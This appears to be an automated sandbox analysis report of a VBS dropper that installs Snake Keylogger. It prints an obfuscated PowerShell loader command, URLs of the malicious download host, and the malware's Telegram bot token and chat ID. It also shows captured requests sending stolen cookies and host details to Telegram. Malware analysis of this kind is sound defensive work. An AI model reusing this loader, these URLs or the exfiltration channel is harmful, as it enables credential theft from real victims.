              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoProbpta epMor,eStrisProd]Ne n=K te$FunkBSpore ,lieFl.c
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6956, ProcessName: svchost.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:40.303553+010028033053Unknown Traffic192.168.2.951190104.21.112.1443TCP
              2025-03-12T19:16:46.958479+010028033053Unknown Traffic192.168.2.951194104.21.112.1443TCP
              2025-03-12T19:16:49.946126+010028033053Unknown Traffic192.168.2.951196104.21.112.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:34.645991+010028032742Potentially Bad Traffic192.168.2.951188193.122.130.080TCP
              2025-03-12T19:16:38.145982+010028032742Potentially Bad Traffic192.168.2.951188193.122.130.080TCP
              2025-03-12T19:16:40.942890+010028032742Potentially Bad Traffic192.168.2.951191193.122.130.080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:31.852209+010028032702Potentially Bad Traffic192.168.2.951187185.10.75.23443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:17:12.958101+010018100081Potentially Bad Traffic192.168.2.951206149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:17:04.867352+010018100071Potentially Bad Traffic192.168.2.951205149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://homaye-salamat.com/top/Collegiant.Avira URL Cloud: Label: malware
              Source: https://homaye-salamat.comAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/Collegiant.pfbAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/tAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/ColleAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CollegiAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CollAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/Collegiant.pfbPAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/finish/jQBlCBkXqDn162.binAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CollegiantAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/Collegiant.pAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CollegiaAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/toAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/Avira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/topAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/Collegiant.pfAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CoAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/ColAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CollegianAvira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/Avira URL Cloud: Label: malware
              Source: https://homaye-salamat.com/top/CollegAvira URL Cloud: Label: malware
              Source: 00000011.00000002.2189282837.00000000258F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8", "Chat_id": "1503224244", "Version": "4.4"}
              Source: Payment_Advise.vbsVirustotal: Detection: 27%Perma Link
              Source: Payment_Advise.vbsReversingLabs: Detection: 18%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F8340 CryptUnprotectData,17_2_252F8340
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252F8A99 CryptUnprotectData,17_2_252F8A99
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:51189 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 185.10.75.23:443 -> 192.168.2.9:49685 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.10.75.23:443 -> 192.168.2.9:51187 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:51205 version: TLS 1.2
              Source: Binary string: ws\System.Core.pdb+#F94 source: powershell.exe, 00000005.00000002.1525574210.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbA# source: powershell.exe, 00000005.00000002.1525574210.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn source: powershell.exe, 00000005.00000002.1525574210.00000000086E0000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0287F8E9h17_2_0287F630
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0287FD41h17_2_0287FA88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DEA79h17_2_252DE7D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252D2D41h17_2_252D2A90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252D3308h17_2_252D2EF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DFBD9h17_2_252DF930
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DD069h17_2_252DCDC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DEED1h17_2_252DEC28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h17_2_252D0040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DF329h17_2_252DF080
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DF781h17_2_252DF4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DE1C9h17_2_252DDF20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252D0D0Dh17_2_252D0B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252D16F8h17_2_252D0B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DE621h17_2_252DE378
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252D3308h17_2_252D3236
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DD4C1h17_2_252DD218
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DD919h17_2_252DD670
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252DDD71h17_2_252DDAC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F7A5Dh17_2_252F7720
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F8E28h17_2_252F8B58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F55D1h17_2_252F5328
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FF607h17_2_252FF338
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FC3D7h17_2_252FC108
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F25A9h17_2_252F2300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FA3E7h17_2_252FA118
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F9637h17_2_252F9368
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F0FF1h17_2_252F0D48
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FD617h17_2_252FD348
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F2A01h17_2_252F2758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FB627h17_2_252FB358
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FA877h17_2_252FA5A8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F1449h17_2_252F11A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F2E59h17_2_252F2BB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FE857h17_2_252FE588
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F5A29h17_2_252F5780
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FC867h17_2_252FC598
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FBAB7h17_2_252FB7E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F18A1h17_2_252F15F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F9AC7h17_2_252F97F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F4471h17_2_252F41C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FFA6Fh17_2_252FF7C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F6869h17_2_252F65C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F5E81h17_2_252F5BD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FDAA7h17_2_252FD7D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FCCF7h17_2_252FCA28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F48C9h17_2_252F4620
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FAD07h17_2_252FAA38
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F62DBh17_2_252F6030
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F32B1h17_2_252F3008
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F6CC1h17_2_252F6A18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FECE7h17_2_252FEA18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FDF37h17_2_252FDC68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F4D21h17_2_252F4A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FBF47h17_2_252FBC78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F7119h17_2_252F6E70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F02E9h17_2_252F0040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F1CF9h17_2_252F1A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F2151h17_2_252F1EA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FF177h17_2_252FEEA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FD187h17_2_252FCEB8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F9F57h17_2_252F9C88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F0741h17_2_252F0498
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FE3C7h17_2_252FE0F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F0B99h17_2_252F08F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F7571h17_2_252F72C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252FB197h17_2_252FAEC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 252F5179h17_2_252F4ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25314390h17_2_25314020
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25314A38h17_2_25314740
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253130AFh17_2_25312DE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253122FFh17_2_25312030
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25318D28h17_2_25318A30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531B830h17_2_2531B538
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531D018h17_2_2531CD20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25316220h17_2_25315F28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531FB20h17_2_2531F828
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253119DFh17_2_25311710
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25317A08h17_2_25317710
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531A510h17_2_2531A218
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253139CFh17_2_25313700
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531BCF8h17_2_2531BA00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25314F00h17_2_25314C08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531E801h17_2_2531E508
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531353Fh17_2_25313270
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531B368h17_2_2531B070
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531DE70h17_2_2531DB78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25310C2Fh17_2_25310960
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25315D58h17_2_25315A60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531F658h17_2_2531F360
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25318860h17_2_25318568
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25312C20h17_2_25312950
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531A048h17_2_25319D50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531CB50h17_2_2531C858
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531030Fh17_2_25310040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531E338h17_2_2531E040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25317540h17_2_25317248
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531D9A8h17_2_2531D6B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25316BB0h17_2_253168B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25311E6Fh17_2_25311BA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25318398h17_2_253180A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531AEA0h17_2_2531ABA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25313E5Fh17_2_25313B90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531C688h17_2_2531C390
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25315890h17_2_25315598
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531F190h17_2_2531EE98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531154Fh17_2_25311280
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25317078h17_2_25316D80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25319B80h17_2_25319888
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253110BFh17_2_25310DF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253166E8h17_2_253163F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253191F0h17_2_25318EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531A9D8h17_2_2531A6E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531D4E0h17_2_2531D1E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531079Fh17_2_253104D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253153C8h17_2_253150D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531ECC8h17_2_2531E9D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 25317ED0h17_2_25317BD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531278Fh17_2_253124C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 253196B8h17_2_253193C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2531C1C0h17_2_2531BEC8

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:51206 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:51205 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficTCP traffic: 192.168.2.9:51179 -> 162.159.36.2:53
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2013/03/2025%20/%2018:06:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd62db31f18cb7Host: api.telegram.orgContent-Length: 740
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:51191 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:51188 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51187 -> 185.10.75.23:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51190 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51194 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:51196 -> 104.21.112.1:443
              Source: global trafficHTTP traffic detected: GET /top/Collegiant.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: homaye-salamat.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /finish/jQBlCBkXqDn162.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: homaye-salamat.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:51189 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
